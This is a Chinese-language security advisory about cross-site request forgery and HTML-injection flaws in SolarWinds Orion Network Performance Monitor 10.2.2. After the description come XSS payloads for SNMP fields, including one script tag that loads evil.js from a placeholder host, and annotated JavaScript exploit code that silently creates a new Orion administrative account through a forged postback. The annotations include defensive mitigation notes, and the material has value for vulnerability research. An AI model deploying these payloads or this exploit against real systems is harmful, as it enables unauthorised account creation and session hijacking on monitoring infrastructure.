SolarWinds Orion Network Performance Monitor (NPM)多个安全漏洞

发布日期:2012-07-21
更新日期:2012-08-06

受影响系统:
SolarWinds Orion Network Performance Monitor (NPM) 10.2.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54624

Orion Network Performance Monitor是带宽性能监控和故障管理软件,能监控并收集来自路由器、交换机、服务器和其他SNMP设备中的数据。

SolarWinds Orion Network Performance Monitor (NPM) 10.2.2及其他版本在实现上存在跨站请求伪造漏洞和多个HTML注入漏洞,攻击者可利用这些漏洞在用户会话中执行非法操作,在受影响站点中执行脚本代码,窃取cookie身份验证凭证或控制站点外观。

<*来源:Muts (muts@whitehat.co.il)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Muts (muts@whitehat.co.il)提供了如下测试方法:

syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script

syscontact <script src="https://www.example.com/evil.js"></script>

*/


/**
 * Looks up one cookie in document.cookie by name.
 *
 * document.cookie is split on ";", each piece is divided at its first "=",
 * the name part is whitespace-trimmed and compared with c_name, and the
 * value of the first match is percent-decoded with unescape(). A piece
 * without "=" yields an empty name and the whole piece as value, exactly
 * like the substr-based original.
 *
 * @param {string} c_name - cookie name to find
 * @returns {string|undefined} decoded value, or undefined when nothing matches
 */
function getCookie(c_name)
{
    const pieces = document.cookie.split(";");
    for (const piece of pieces) {
        const sep = piece.indexOf("=");
        // sep === -1 means "no name": mirror substr(0, -1) -> "".
        const name = (sep === -1 ? "" : piece.slice(0, sep)).trim();
        // Loose equality is kept deliberately so a non-string c_name
        // behaves as it did before.
        if (name == c_name) {
            // slice(sep + 1) with sep === -1 is the whole piece, as substr(0) was.
            return unescape(piece.slice(sep + 1));
        }
    }
    return undefined;
}

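/**
 * Writes a cookie named c_name with value percent-encoded via escape().
 *
 * Fix: the original "; expires=" literal was broken across two source lines
 * (an unterminated string, i.e. a syntax error); it is a single literal here.
 * Behaviour is otherwise unchanged: when exdays is null or undefined no
 * expires attribute is written and the cookie is a session cookie.
 *
 * Note for defenders: a cookie set from script can never be HttpOnly, and this
 * helper sets no Secure or SameSite attribute either, so anything stored
 * through it is readable by any script running on the page.
 *
 * @param {string} c_name - cookie name
 * @param {string} value - cookie value, stored escape()-encoded
 * @param {number|null|undefined} exdays - days until expiry; null/undefined for a session cookie
 * @returns {void}
 */
function setCookie(c_name,value,exdays)
{
    var c_value = escape(value);
    // Only emit an expires attribute when an expiry was actually requested.
    if (exdays != null) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        c_value += "; expires=" + exdate.toUTCString();
    }
    document.cookie = c_name + "=" + c_value;
}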

/**
 * Replays the Orion "add account" WebForms postback from inside the victim's
 * browser — the cross-site request forgery the advisory describes. The body
 * carries only the page's __VIEWSTATE plus whatever Orion cookies the browser
 * attaches on its own; no per-session anti-forgery token is sent, which the
 * advisory implies the server did not require.
 *
 * Defensive notes: server-side, this is a POST to the account-creation page
 * whose ViewState is presumably not bound to the requester's session; binding
 * it (ASP.NET ViewStateUserKey or an equivalent anti-forgery token), SameSite
 * session cookies, and alerting on newly created administrative accounts are
 * the usual mitigations.
 *
 * @param {string} viewState - __VIEWSTATE value for the form; URI-encoded before use
 * @param {string} user - account name; concatenated into the body unencoded
 * @param {string} password - account password; concatenated unencoded and sent
 *   as both Password and ConfirmPassword
 * @returns {Document} detached HTML document parsed from the response body
 */
function postCredentials(viewState, user, password)
{
    var http = new XMLHttpRequest();
    // Same-origin admin page; the browser adds the ambient Orion session cookies.
    var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
   
    // WebForms postback fields (control ids are pre-encoded, %24 = "$").
    // Only viewState goes through encodeURIComponent; user and password are
    // concatenated raw, so an "&" or "=" in either would corrupt the body.
    var params =
"ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager"
+ "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
                 "__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
                 "__EVENTARGUMENT" + "=" + "&" +
                 "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName"
+ "=" + user + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password"
+ "=" + password + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword"
+ "=" + password + "&" +
                 "__ASYNCPOST" + "=" + "false"
                 
    // Synchronous XHR (third argument false): the calling page blocks until
    // the response has arrived.
    http.open("POST", url, false);
    http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
    // Header name is misspelled ("Content-lenth"); browsers also compute
    // Content-Length themselves and refuse script-set Content-Length and
    // Connection headers, so these two lines have no useful effect.
    http.setRequestHeader("Content-lenth", params.length);
    http.setRequestHeader("Connection", "close");
    http.send(params);
    var response = http.responseText;
    // Parse the reply into a detached document (not attached to the page);
    // script in a document created this way is not executed.
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = response;
    return(doc);
}
